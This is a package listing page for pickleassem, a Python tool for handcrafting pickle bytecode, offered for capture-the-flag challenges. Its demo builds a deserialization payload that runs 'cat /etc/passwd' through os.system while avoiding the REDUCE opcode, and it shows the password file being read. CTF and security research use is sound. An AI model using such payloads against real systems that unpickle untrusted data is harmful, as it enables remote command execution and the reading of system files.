Last updated:
0 purchases
pickleassem 1.1.0
pickleassem
A simple pickle assembler to make handcrafting pickle bytecode easier.
This is useful for CTF challenges like pyshv in Balsn CTF 2019.
Demo
import pickle
import pickletools
from pickleassem import PickleAssembler
pa = PickleAssembler(proto=4)
pa.push_mark()
pa.util_push('cat /etc/passwd')
pa.build_inst('os', 'system')
payload = pa.assemble()
assert b'R' not in payload
print(payload)
pickletools.dis(payload, annotate=1)
pickle.loads(payload)
Output:
b'\x80\x04(\x8c\x0fcat /etc/passwdios\nsystem\n.'
0: \x80 PROTO 4 Protocol version indicator.
2: ( MARK Push markobject onto the stack.
3: \x8c SHORT_BINUNICODE 'cat /etc/passwd' Push a Python Unicode string object.
20: i INST 'os system' (MARK at 2) Build a class instance.
31: . STOP Stop the unpickling machine.
highest protocol among opcodes = 4
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
Installation
Install with pip: pip install -U pickleassem
Documentation
Just refer to the source code. Each method of PickleAssembler whose name begins with push, build, pop or memo corresponds to a pickle opcode. Methods whose name begins with util are higher-level utility functions. append_raw can be used to insert arbitrary raw opcode.
The following opcodes and corresponding features are not implemented: PERSID, BINPERSID, EXT1, EXT2, EXT4, FRAME, NEXT_BUFFER, READONLY_BUFFER.
See Also
Other tools for pickle exploit:
anapickle: slides, repo
pwnypack.pickle
For personal and professional use. You cannot resell or redistribute these repositories in their original state.
There are no reviews.